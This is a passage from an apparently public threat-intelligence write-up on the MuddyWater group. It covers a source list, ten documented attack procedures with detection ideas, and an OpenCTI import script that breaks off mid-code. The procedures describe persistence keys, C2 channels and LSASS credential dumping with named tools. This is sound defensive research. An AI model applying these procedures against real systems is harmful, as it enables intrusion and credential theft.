— Procedure Candidate Extraction</strong></p><p>From the bound claims, 10 procedure candidates were grouped by tactic: Initial Access, Execution, Persistence, Defense Evasion, Discovery, C2, Credential Access. Each candidate recorded: required telemetry, detection opportunity, whether lab validation was feasible, and whether the procedure appeared in multiple independent sources (a promotion signal for higher confidence scores later).</p><h4>The Full 71-Source Candidate List</h4><p>This is the deduplicated list produced after comparing Gemini and OpenAI outputs. Every source here was an acquisition target for Step 5.</p><p><strong>Core MuddyWater / Seedworm / TA450 / Mango Sandstorm</strong></p><ol><li><a href="https://attack.mitre.org/groups/G0069/">MITRE ATT&amp;CK — MuddyWater G0069</a></li><li><a href="https://attack.mitre.org/software/S0223/">MITRE ATT&amp;CK — POWERSTATS S0223</a></li><li><a href="https://attack.mitre.org/software/S1046/">MITRE ATT&amp;CK — PowGoop S1046</a></li><li><a href="https://www.cisa.gov/news-events/alerts/2022/02/24/iranian-government-sponsored-muddywater-actors-conducting-malicious">CISA alert — Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber Operations</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A advisory page</a></li><li><a href="https://www.cisa.gov/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A PDF</a></li><li><a href="https://media.defense.gov/2022/Feb/24/2002944274/-1/-1/0/CSA_AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.PDF">U.S. Cyber Command / Defense media — AA22–055A PDF mirror</a></li><li><a href="https://www.ncsc.gov.uk/news/joint-advisory-observes-muddywater-actors-conducting-cyber-espionage">NCSC-UK — Joint advisory on MuddyWater actor</a></li><li><a href="https://www.iranwatch.org/sites/default/files/cybercom_muddywater_press_release.pdf">U.S. Cyber Command / Iran Watch mirror — Iranian intel cyber suite of malware PDF</a></li><li><a href="https://duo.com/decipher/us-cyber-command-discloses-muddywater-malware-samples">Decipher — US Cyber Command Discloses MuddyWater Malware Samples</a></li><li><a href="https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/">SentinelOne — Wading Through Muddy Waters</a></li><li><a href="https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/">Palo Alto Unit 42 — Muddying the Water: Targeted Attacks in the Middle East</a></li><li><a href="https://radar.certfa.com/en/insights/cluster/fe272810/">CERTFA Radar — MuddyWater Threat Actor Cluster</a></li><li><a href="https://radar.certfa.com/en/threats/view/d7c9c420/">CERTFA Radar — MuddyWater / Earth Vetala Intrusion</a></li><li><a href="https://www.group-ib.com/masked-actors/muddywater/">Group-IB — MuddyWater APT Group Profile</a></li></ol><p><strong>Israel-Focused MuddyWater Sources</strong></p><ol><li><a href="https://www.gov.il/en/pages/_muddywater">Israel National Cyber Directorate — MuddyWater page</a></li><li><a href="https://www.gov.il/BlobFolder/news/_muddywater/en/government%20threat%20actor.pdf">Israel National Cyber Directorate — MuddyWater / DarkBit PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/maddy_water_2024/en/ALERT_CERT_IL_W_1858.pdf">Israel National Cyber Directorate — Technological Advancement and Evolution of MuddyWater in 2024 PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/alert_1947/he/ALERT-CERT-IL-W-1947.pdf">Israel National Cyber Directorate — Overview of Recent Phishing PDF</a></li><li><a href="https://www.clearskysec.com/operation-quicksand/">ClearSky — Operation Quicksand: MuddyWater’s Offensive Attack Against Israeli Organizations</a></li><li><a href="https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf">ClearSky — Operation Quicksand PDF</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/">Microsoft — MERCURY and DEV-1084: Destructive attack on hybrid environment</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/">Microsoft — Exposing POLONIUM activity and infrastructure targeting Israeli organizations</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign">Proofpoint — TA450 Uses Embedded Links in PDF Attachments in Latest Campaign</a></li><li><a href="https://harfanglab.io/insidethelab/muddywater-rmm-campaign/">HarfangLab — MuddyWater campaign abusing Atera Agents</a></li><li><a href="https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework">Deep Instinct — DarkBeatC2: The Latest MuddyWater Attack Framework</a></li><li><a href="https://www.scworld.com/brief/novel-c2-tool-leveraged-in-latest-muddywater-attacks">SC Media — Novel C2 tool leveraged in latest MuddyWater attacks</a></li><li><a href="https://blog.checkpoint.com/research/muddywater-threat-group-deploys-new-bugsleep-backdoor/">Check Point — MuddyWater Threat Group Deploys New BugSleep Backdoor</a></li><li><a href="https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/">ESET / WeLiveSecurity — MuddyWater: Snakes by the riverbank</a></li><li><a href="https://www.eset.com/uk/about/newsroom/press-releases/iran-muddywater-critical-infrastructure-israel-egypt-snake-game-eset-research-uk/">ESET press release — Iran’s MuddyWater targets critical infrastructure in Israel and Egypt</a></li><li><a href="https://securityaffairs.com/185244/apt/muddywater-strikes-israel-with-advanced-muddyviper-malware.html">Security Affairs — MuddyWater strikes Israel with advanced MuddyViper malware</a></li><li><a href="https://thehackernews.com/2024/03/iran-linked-muddywater-deploys-atera.html">The Hacker News — Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks</a></li></ol><p><strong>Recent / Evolving MuddyWater Activity</strong></p><ol><li><a href="https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix">Proofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFix</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/crossed-wires-case-study-iranian-espionage-and-attribution">Proofpoint — Crossed Wires: a case study of Iranian espionage and attribution</a></li><li><a href="https://www.group-ib.com/blog/muddywater-operation-olalampo/">Group-IB — Operation Olalampo: Inside MuddyWater’s Latest Campaign</a></li><li><a href="https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html">The Hacker News — MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIP</a></li><li><a href="https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/">Rapid7 — Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware</a></li><li><a href="https://thehackernews.com/2026/05/muddywater-uses-microsoft-teams-to.html">The Hacker News — MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack</a></li><li><a href="https://www.rapid7.com/research/iran-conflict-cyber-threats/">Rapid7 — Iran Conflict Cyber Threat Intelligence</a></li><li><a href="https://www.extrahop.com/blog/the-digital-front-of-iranian-cyber-offensive-and-defensive-response">ExtraHop — The Digital Front of Iranian Cyber Offensive and Defensive Response</a></li><li><a href="https://abnormal.ai/blog/iran-aligned-cyber-operations-email-threats">Abnormal Security — Tracking Iran-Aligned Cyber Operations Following U.S.-Israel Strikes</a></li><li><a href="https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/">Unit 42 — Boggy Serpens Threat Assessment</a></li><li><a href="https://hivepro.com/threat-advisory/muddywater-irans-adaptive-cyber-espionage-machine/">Hive Pro — MuddyWater: Iran’s Adaptive Cyber Espionage Machine</a></li><li><a href="https://hivepro.com/wp-content/uploads/2026/03/TA2026082.pdf">Hive Pro — MuddyWater / Operation Olalampo PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2024/10/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2024-en.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2024 PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2025/09/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2025-en-2.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2025 PDF</a></li><li><a href="https://documents.trendmicro.com/assets/pdf/Annual_APT_Report_2025.pdf">Trend Micro — Annual APT Report 2025 PDF</a></li><li><a href="https://go.intel471.com/hubfs/Emerging%20Threats/2025%20Emerging%20Threats/Upd%20HUNTER%20-%20Iranian%20Threat%20Actor%20Coverage.pdf">Intel 471 — HUNTER Iranian Threat Actor Coverage PDF</a></li></ol><p><strong>Iran Threat Context and Comparison Actors</strong></p><ol><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran">CISA — Iran Threat Overview and Advisories</a></li><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors/iran/publications">CISA — Iran state-sponsored cyber threat publications</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">CISA — AA23–335A: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors</a></li><li><a href="https://www.cisa.gov/sites/default/files/2023-12/aa23-335a-irgc-affiliated-cyber-actors-exploit-plcs-in-multiple-sectors-1.pdf">CISA — AA23–335A PDF</a></li><li><a href="https://attack.mitre.org/groups/G0049/">MITRE ATT&amp;CK — APT34</a></li><li><a href="https://attack.mitre.org/groups/G0059/">MITRE ATT&amp;CK — APT35 / Charming Kitten</a></li><li><a href="https://attack.mitre.org/groups/G1030/">MITRE ATT&amp;CK — Agrius</a></li><li><a href="https://www.microsoft.com/en-us/security/security-insider/mint-sandstorm">Microsoft — Mint Sandstorm</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/">Microsoft — Peach Sandstorm deploys new custom Tickler malware</a></li><li><a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide">Microsoft Learn — How Microsoft names threat actors</a></li><li><a href="https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/">SentinelOne — Iranian Cyber Activity Outlook</a></li><li><a href="https://mirror.gpmidi.net/vx-underground/Malware%20Analysis/2024/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability/Paper/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability.pdf">Trellix — The Iranian Cyber Capability PDF</a></li></ol><p><strong>OpenCTI / STIX / Knowledge Graph References</strong></p><ol><li><a href="https://docs.opencti.io/latest/usage/data-model/">OpenCTI documentation — Data model</a></li><li><a href="https://docs.opencti.io/latest/reference/api/">OpenCTI documentation — GraphQL API</a></li><li><a href="https://docs.opencti.io/latest/usage/deduplication/">OpenCTI documentation — Deduplication</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html">OASIS — STIX 2.1 HTML specification</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/cs02/stix-v2.1-cs02.pdf">OASIS — STIX 2.1 PDF specification</a></li><li><a href="https://stixproject.github.io/documentation/concepts/relationships/">STIX Project — Relationships</a></li><li><a href="https://arxiv.org/abs/2303.09999">STIXnet — Extracting STIX Objects in CTI Reports</a></li><li><a href="https://arxiv.org/abs/2507.16576">From Text to Actionable Intelligence: Automating STIX Entity and Relationship Extraction</a></li><li><a href="https://arxiv.org/abs/2605.15904">Context-aware Entity-Relation Extraction for Threat Intelligence Knowledge Graphs</a></li></ol><p><strong>Validate Before Promoting</strong></p><ol><li><a href="https://brandefense.io/wp-content/uploads/2025/10/brandefense.io-muddywater-iran-linked-espionage-group-expanding-global-reach-muddywater-.pdf">Brandefense — MuddyWater PDF</a></li><li><a href="https://assets.kpmg.com/content/dam/kpmgsites/in/pdf/2022/07/KPMG_CTI_Report_muddy.pdf.coredownload.inline.pdf">KPMG — CTI Report MuddyWater PDF</a></li></ol><p><strong>Critical discipline:</strong> AI output was used only for source discovery. Every claim, mapping, and detection record required analyst review before entering the dataset.</p><h3>Phase 2: Procedure Dataset</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ji8MQqr4SpW620AV3QN67A.png"></figure><p>A procedure record is not an ATT&amp;CK technique. ATT&amp;CK describes what a class of actors <em>can</em> do. A procedure record describes what <em>this actor</em> did, in <em>this campaign</em>, as documented by <em>this source</em>, with a specific evidence label attached.</p><p>The distinction matters for detection. “Adversaries use scheduled tasks (T1053.005)” does not help you tune a detection rule. “BugSleep creates a scheduled task with a 43-minute repeat interval (INCD 2024, Observed)” does — because you now have a concrete interval to hunt for, a specific tool name, and a source you can cite in your detection rationale.</p><p>Each of the 10 records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/procedures.yaml">data/procedures.yaml</a> captures four things:</p><ul><li>The specific behavior — not the technique category</li><li>The source references that support it, with evidence labels</li><li>Candidate ATT&amp;CK technique mappings and the reasoning behind each candidate</li><li>Required telemetry, a detection idea, validation plan, and known limitations</li></ul><h4>Confidence Labels</h4><p>Each record carries one of four evidence labels inherited from the source assessment:</p><p><strong>Observed</strong> — the behavior appears directly in source telemetry, a recovered sample, a screenshot, or a government incident report with direct visibility into the event. This is the strongest label and the only one that justifies a high-priority detection without further corroboration.</p><p><strong>Reported</strong> — a source states the behavior occurred, but the evidence is assertion-level rather than artifact-level. Still usable; requires corroboration before relying on it alone.</p><p><strong>Assessed</strong> — the source draws an analytical conclusion based on multiple indicators. Appropriate for ATT&amp;CK candidate mappings; not sufficient alone for a new detection claim.</p><p><strong>Inferred</strong> — analyst conclusion derived from combining multiple reported facts across sources. Weakest label; flag for review before using in production.</p><p>All 10 procedures in this dataset carry <strong>Observed</strong> or <strong>High</strong> confidence. That is not a coincidence — it reflects the promotion threshold. Procedures that came only from secondary or inferred sources were not promoted into data/procedures.yaml; they stayed in the claim extraction notes for future work.</p><h4>The 10 Procedures</h4><p><strong>proc_mw_0001 — Spearphishing Email Delivery</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1566.001, T1566.002, T1534</em></p><p>Three delivery variants documented across all three primary government sources: ZIP attachments containing macro-enabled Excel files or PDFs; email links to Egnyte or OneDrive delivering compressed RMM installers; and emails sent from compromised legitimate accounts to increase lure credibility. In 2024, a Microsoft-update-lure campaign sent to 10,000+ accounts embedded a PowerShell API key, granting the actor direct agent access immediately after the RMM tool installed. Three independent government sources corroborate this procedure — it is the highest-confidence initial access vector in the dataset.</p><p><strong>proc_mw_0002 — Public-Facing Exploitation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1190</em></p><p>Secondary initial access vector to phishing. Documented CVEs: CVE-2020–1472 (Netlogon/Zerologon), CVE-2020–0688 (Exchange), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities confirmed by INCD 2024. Exploitation is typically followed by RMM tool deployment or custom backdoor staging. The VPN claim from INCD 2024 does not name a specific CVE — treat as Reported until a CVE is attributed.</p><p><strong>proc_mw_0003 — PowerShell Execution and Script Obfuscation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1059.001, T1027</em></p><p>Cross-cutting technique present in every tool tier. PowGoop uses an obfuscated .dat + config.txt PowerShell chain for C2 beaconing. POWERSTATS is a persistent PowerShell backdoor. The 2024 lure embedded an API key executed via PowerShell to grant direct agent access. Obfuscation is applied consistently via Base64, XOR, and custom encoding. Detection anchor: Script Block Logging (EID 4104) is the primary telemetry dependency — without it, this procedure is nearly invisible to endpoint-only detection.</p><p><strong>proc_mw_0004 — DLL Side-Loading</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1574.002</em></p><p>PowGoop’s canonical execution method: a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load and execute the malicious DLL. INCD 2024 confirms continued use across the 2024 toolset. Detection requires Sysmon EID 7 (image load) with signing status — not available from Windows Event Log alone. This is the most telemetry-constrained procedure in the dataset; validation was PARTIAL because the lab's stub DLL did not produce sufficient EID 7 signal.</p><p><strong>proc_mw_0005 — Registry Run Key and Startup Folder Persistence</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1547.001</em></p><p>Small Sieve adds index.exe under the Run key named OutlookMicrosift — mimicking a Microsoft application name. Canopy installs its first WSF script in the startup folder. AA22-055A documents an additional key: SystemTextEncoding. INCD 2024 confirms continued use. The specific key names (OutlookMicrosift, SystemTextEncoding) are high-confidence IoCs when present; a detection based only on "new Run key written by a non-installer" will generate noise in most enterprise environments.</p><p><strong>proc_mw_0006 — Scheduled Task (43-Minute Beacon)</strong> <em>Confidence: Observed · Source: INCD 2024 (single source) · ATT&amp;CK: T1053.005</em></p><p>BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing. The interval is documented as customizable, but 43 minutes is the specific value observed in the INCD 2024 analysis. This is a single-source procedure — INCD 2024 only — which is why it carries a coverage score of 4 (correlated analytic) rather than 5 in the detection atlas. Before treating this interval as a high-confidence fingerprint in production, corroborate with a vendor source.</p><p><strong>proc_mw_0007 — RMM Tool Abuse</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024, multiple vendor sources · ATT&amp;CK: T1219</em></p><p>The most consistently documented technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple vendor sources), SimpleHelp, Level, PDQConnect (2024). The 2024 lure embedded an API key so the actor had direct agent access the moment the victim installed the tool. Detection must rely on delivery context and parent process — not binary name alone, since these are legitimate commercial tools.</p><p><strong>proc_mw_0008 — C2 via Web Protocols and DNS Tunneling</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1071.001, T1572, T1102</em></p><p>Multiple C2 channels documented. Small Sieve beacons via Telegram Bot API over HTTPS. Canopy sends collected data via HTTP POST. Blackout uses GET /questions and POST /about-us. AnchorRAT communicates over HTTPS port 443 in JSON format. Mori uses DNS tunneling. In 2024, Rentry.co was used as a legitimate platform for C2 redirection. The Telegram API is the highest-confidence detection anchor: outbound HTTPS to api.telegram.org from a non-browser process is unusual in enterprise environments and directly attributed across multiple sources.</p><p><strong>proc_mw_0009 — WMI System Discovery Survey</strong> <em>Confidence: Observed · Source: AA22–055A (script documented verbatim) · ATT&amp;CK: T1047, T1082, T1016, T1033, T1518.001</em></p><p>MuddyWater runs a PowerShell script that queries WMI to collect: IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username, and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2. The exact script is reproduced in the CISA advisory. The SecurityCenter2 query is the detection anchor: legitimate enterprise software rarely queries this WMI namespace outside AV management contexts, making it a low-noise signal.</p><p><strong>proc_mw_0010 — Credential Dumping from LSASS and Credential Stores</strong> <em>Confidence: Observed · Source: AA22–055A · ATT&amp;CK: T1003.001, T1003.004, T1003.005</em></p><p>Post-access credential access using three tools: Mimikatz and procdump64.exe against LSASS memory (T1003.001); LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005). Used post-exploitation to enable lateral movement with harvested credentials. Detection via Sysmon EID 10 (process accessing lsass.exe) is tool-agnostic — it fires regardless of whether the actor uses Mimikatz, procdump, or a custom variant with a different binary name. This is the most reliable detection path for this procedure.</p><h3>Phase 3: OpenCTI Knowledge Graph</h3><p>The procedure dataset and source register go into a self-hosted OpenCTI 6.2 instance. This creates the analytical record — queryable, relationship-aware, ATT&amp;CK-linked.</p><h3>OpenCTI Deployment</h3><p>The stack used in this project is documented and publicly reproducible. The full deployment — Docker Compose, connectors, and an AI enrichment connector that calls Claude via the Anthropic API — lives in a dedicated project:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200/opencti-intelligent-shield">github.com/anpa1200/opencti-intelligent-shield</a></li></ul><p><a href="https://github.com/anpa1200/opencti-intelligent-shield">GitHub - anpa1200/opencti-intelligent-shield: OpenCTI AI-driven threat intelligence enrichment with Claude and Docusaurus documentation</a></p><ul><li><strong>Medium guide:</strong></li></ul><p><a href="https://medium.com/@1200km/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a></p><ul><li><strong>Main guide:</strong> <a href="https://anpa1200.github.io/opencti-intelligent-shield/">anpa1200.github.io/opencti-intelligent-shield</a></li></ul><p><a href="https://anpa1200.github.io/opencti-intelligent-shield">OpenCTI AI Enrichment | The Intelligent Shield</a></p><p>The Intelligent Shield project covers: OpenCTI core stack (Redis, Elasticsearch, MinIO, RabbitMQ, platform, workers), MITRE ATT&amp;CK connector, and a custom internal enrichment connector that uses Claude to automatically summarize and enrich threat objects. Docker Compose files, a sanitized .env.example, and full setup instructions are all version-controlled.</p><p>To spin up the stack standalone (outside Operation Desert Hydra):</p><pre>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd openCTI<br>cp .env.example .env<br># fill in tokens and passwords<br>./scripts/start-all.sh   # OpenCTI at :8080<br>./scripts/stop-all.sh    # halt, preserves volumes</pre><p>In the context of Operation Desert Hydra the stack is embedded in stack/ and started with bash start.sh — no separate clone needed. The Intelligent Shield project is the standalone reference deployment for anyone who wants OpenCTI without the lab.</p><h4>Step 10: Stack Start</h4><pre>bash start.sh --skip-lab   # starts OpenCTI + Elasticsearch + Kibana only</pre><p>All 12 core containers start: Redis, Elasticsearch, MinIO, RabbitMQ, OpenCTI platform, 3 workers, and the MITRE ATT&amp;CK connector.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_8pjCgFqyge4o-bahQTX6Q.png"></figure><p><strong>Result:</strong> OpenCTI reachable at http://localhost:8080. All containers healthy.</p><h4>Step 11: MITRE ATT&amp;CK Connector Sync</h4><p>The MITRE ATT&amp;CK connector loads 846 techniques into the graph. This sync must complete before the import script can link procedures to techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k4o9xri96voJcB0EUQPqfg.png"></figure><p><strong>Result:</strong> 846 ATT&amp;CK patterns loaded. Connector state: ACTIVE.</p><h4>Step 12: Import Script</h4><p>Script: <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/tools/opencti_import.py"><strong>tools/opencti_import.py</strong></a></p><pre>export OPENCTI_URL=http://localhost:8080<br>export OPENCTI_TOKEN=&lt;admin token from stack/.env&gt;<br>python3 tools/opencti_import.py</pre><p>The script reads data/sources.yaml and data/procedures.yaml — it does not hardcode any intelligence. The YAML files are the single source of truth; the script is just a translation layer from those files into OpenCTI's API.</p><p><strong>What it creates and why:</strong></p><p><strong>Step 1 — Iran MOIS (Identity: Organization).</strong> Every object in OpenCTI needs a createdBy reference. Creating the sponsoring organization first gives all downstream objects a consistent authoring context and makes the attribution relationship explicit in the graph: MuddyWater → attributed-to → Iran MOIS.</p><p><strong>Step 2 — MuddyWater (Intrusion Set).</strong> The intrusion set object carries all known aliases: Seedworm, Mango Sandstorm, TA450, Static Kitten, TEMP.Zagros, Mercury, DEV-1084. Aliases matter for deduplication — OpenCTI uses them to avoid creating duplicate entities when the same actor appears under different names in different reports.</p><p><strong>Step 3 — Malware catalog (9 objects).</strong> Each actor-developed tool gets a Malware object with a description derived from source reporting. The catalog: POWERSTATS, PowGoop, Small Sieve, Canopy, Mori, BugSleep, AnchorRAT, SyncroRAT, DarkBit.</p><p><strong>Step 4 — Tool catalog (4 objects).</strong> Legitimate tools abused by the actor are STIX Tool objects, not Malware — the distinction matters for downstream analysis. The catalog: AteraAgent, SimpleHelp, Mimikatz, LaZagne.</p><p><strong>Step 5 — uses relationships.</strong> MuddyWater → uses → each malware and tool object. These relationships make the graph queryable: “which tools does this actor use?” returns all 13 objects in one hop.</p><p><strong>Step 6 — Reports from sources.yaml.</strong> One Report object per promoted source, with publisher, reliability rating, credibility score, actor claims, key entities, and ATT&amp;CK candidates written into the description. MuddyWater is added as an object reference so each report is queryable from the actor page.</p><p><strong>Step 7 — ATT&amp;CK pattern links from procedures.yaml.</strong> Iterates all attck_candidates across the 10 procedure records and creates MuddyWater → uses → ATT&amp;CK technique relationships. If the MITRE connector has not yet synced a technique, the script creates a stub Attack Pattern object (with x_mitre_id set) and flags it for enrichment. This prevents the import from failing on a timing issue between the connector sync and the import run.</p><p>The script is <strong>idempotent</strong>: every object lookup uses a read() before create(). Re-running after a partial failure or after the MITRE connector syncs simply confirms existing objects and fills in any gaps.</p><pre>#!/usr/bin/env python3<br>"""<br>Desert Hydra — Phase 3 OpenCTI graph import.Reads data/sources.yaml and data/procedures.yaml and creates:<br>  - Identity:       Iran MOIS (organization)<br>  - Intrusion Set:  MuddyWater (with all known aliases)<br>  - Malware:        actor-developed tools (9 objects)<br>  - Tool:           legitimate tools abused (4 objects)<br>  - Reports:        one per promoted source (up to 20)<br>  - Relationships:  attributed-to, uses (malware/tool/ATT&amp;CK)<br>Idempotent - existing objects are not duplicated.<br>ATT&amp;CK pattern links are skipped for techniques not yet synced by the<br>MITRE connector; re-run the script after the MITRE sync completes.<br>Usage:<br>    export OPENCTI_URL=http://localhost:8080<br>    export OPENCTI_TOKEN=&lt;admin-token&gt;<br>    python3 tools/opencti_import.py<br>"""<br>import os<br>import sys<br>import yaml<br>from pathlib import Path<br>from pycti import OpenCTIApiClient<br>from pycti.entities.opencti_identity import IdentityTypes<br># ── Bootstrap ─────────────────────────────────────────────────────────────────<br>OPENCTI_URL   = os.environ.get("OPENCTI_URL",   "http://localhost:8080")<br>OPENCTI_TOKEN = os.environ.get("OPENCTI_TOKEN", "")<br>REPO_ROOT     = Path(__file__).resolve().parent.parent<br>if not OPENCTI_TOKEN:<br>    sys.exit("ERROR: set OPENCTI_TOKEN environment variable")<br>api = OpenCTIApiClient(url=OPENCTI_URL, token=OPENCTI_TOKEN, log_level="error")<br>print(f"[desert-hydra] Connected  {OPENCTI_URL}")<br># ── Load YAML data ─────────────────────────────────────────────────────────────<br>with open(REPO_ROOT / "data" / "sources.yaml") as f:<br>    SOURCES = yaml.safe_load(f)["sources"]<br>with open(REPO_ROOT / "data" / "procedures.yaml") as f:<br>    PROCEDURES = yaml.safe_load(f)["procedures"]<br>print(f"[desert-hydra] Loaded {len(SOURCES)} sources, {len(PROCEDURES)} procedures")<br># ── TLP:WHITE ─────────────────────────────────────────────────────────────────<br>def get_tlp_white():<br>    results = api.marking_definition.list(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "definition", "values": ["TLP:WHITE"]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if results:<br>        return results[0]["id"]<br>    obj = api.marking_definition.create(<br>        definition_type="TLP",<br>        definition="TLP:WHITE",<br>        x_opencti_color="#ffffff",<br>        x_opencti_order=0,<br>    )<br>    return obj["id"]<br>TLP_WHITE = get_tlp_white()<br># ── Helpers ───────────────────────────────────────────────────────────────────<br>def _find(accessor, name):<br>    """Look up a STIX object by name. Returns the object dict or None."""<br>    return accessor.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "name", "values": [name]}],<br>            "filterGroups": [],<br>        }<br>    )<br><br>def link(from_id, to_id, rel_type, confidence=80):<br>    """Create a STIX core relationship; silently skip if it already exists."""<br>    try:<br>        api.stix_core_relationship.create(<br>            fromId=from_id,<br>            toId=to_id,<br>            relationship_type=rel_type,<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>        )<br>    except Exception:<br>        pass<br><br>ATTCK_NAMES = {<br>    "T1574.002": "DLL Side-Loading",<br>    "T1574.001": "DLL Search Order Hijacking",<br>    "T1546.015": "Component Object Model Hijacking",<br>    "T1218.010": "Regsvr32",<br>}<br>def find_or_create_attack_pattern(mitre_id):<br>    """Look up an ATT&amp;CK pattern by x_mitre_id. Create stub if not synced yet."""<br>    result = api.attack_pattern.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "x_mitre_id", "values": [mitre_id]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if result:<br>        return result["id"], False<br>    name = ATTCK_NAMES.get(mitre_id, mitre_id)<br>    obj = api.attack_pattern.create(<br>        name=name,<br>        x_mitre_id=mitre_id,<br>        description=f"MITRE ATT&amp;CK technique {mitre_id}. Created as stub pending MITRE connector sync.",<br>        objectMarking=[TLP_WHITE],<br>        confidence=75,<br>    )<br>    return obj["id"], True<br># ── Step 1: Iran MOIS Identity ────────────────────────────────────────────────<br>existing = _find(api.identity, "Iran MOIS")<br>if existing:<br>    MOIS_ID = existing["id"]<br>else:<br>    obj = api.identity.create(<br>        type=IdentityTypes.ORGANIZATION.value,<br>        name="Iran MOIS",<br>        description=(<br>            "Iranian Ministry of Intelligence and Security (MOIS). "<br>            "State sponsor attributed to MuddyWater cyber operations by CISA, FBI, "<br>            "CNMF, NCSC-UK, and NSA in joint advisory AA22-055A (February 2022)."<br>        ),<br>        objectMarking=[TLP_WHITE],<br>        confidence=85,<br>    )<br>    MOIS_ID = obj["id"]<br># ── Step 2: MuddyWater Intrusion Set ──────────────────────────────────────────<br>existing = _find(api.intrusion_set, "MuddyWater")<br>if existing:<br>    MW_ID = existing["id"]<br>else:<br>    obj = api.intrusion_set.create(<br>        name="MuddyWater",<br>        aliases=[<br>            "Seedworm", "Mango Sandstorm", "TA450",<br>            "Static Kitten", "TEMP.Zagros", "Mercury", "DEV-1084",<br>        ],<br>        description=(<br>            "Iranian MOIS subordinate threat group active since at least 2017. "<br>            "Targets government, defense, telecom, oil and gas, and MSPs globally. "<br>            "Significant focus on Israeli organizations since 2022. Known for "<br>            "spearphishing, RMM tool abuse, and 